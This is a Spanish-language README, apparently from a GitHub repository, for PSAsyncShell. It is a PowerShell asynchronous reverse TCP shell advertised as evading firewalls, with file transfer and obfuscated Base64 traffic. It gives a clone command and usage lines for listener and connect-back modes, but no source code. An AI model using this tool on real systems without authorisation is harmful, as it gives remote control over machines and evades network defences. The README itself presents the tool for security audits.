
Shell inversa TCP asíncrona en PowerShell puro que evade firewalls mediante E/S no bloqueante, con historial de comandos, carga/descarga de archivos y tráfico Base64 ofuscado.

PSAsyncShell es una Shell TCP Inversa Asíncrona escrita en PowerShell puro.
A diferencia de otros reverse shells, todo el flujo de comunicación y ejecución se realiza de forma asíncrona, permitiendo omitir algunos firewalls y algunas contramedidas contra este tipo de conexiones remotas.
Adicionalmente, esta herramienta cuenta con historial de comandos, limpieza de pantalla, carga y descarga de archivos, división de información en fragmentos y tráfico codificado en Base64 URL inverso y ofuscado.
Se recomienda clonar el repositorio completo o descargar el archivo zip. Puedes hacerlo ejecutando el siguiente comando:
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: Esta herramienta te ayuda a obtener una shell remota
a través de TCP asíncrono para evadir firewalls
Uso: .\PSAsyncShell.ps1 -s -p puerto_escucha
Escucha una nueva conexión del cliente
.\PSAsyncShell.ps1 -c ip_servidor puerto_servidor
Conecta el cliente a un servidor PSAsyncShell
Advertencia: Todos los datos se enviarán sin cifrar
La función de carga no utiliza MultiPart
Este proyecto está licenciado bajo la licencia GNU 3.0 - consulte el archivo LICENSE para más detalles.
Esta herramienta ha sido creada y diseñada desde cero por Joel Gámez Molina // @JoelGMSec
Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el consentimiento correspondiente del cliente. No me hago responsable de su mal uso ni de cualquier posible daño causado por el mismo.
Para más información, puedes encontrarme en Twitter como @JoelGMSec y en mi blog darkbyte.net.
Puedes apoyar mi trabajo invitándome a un café: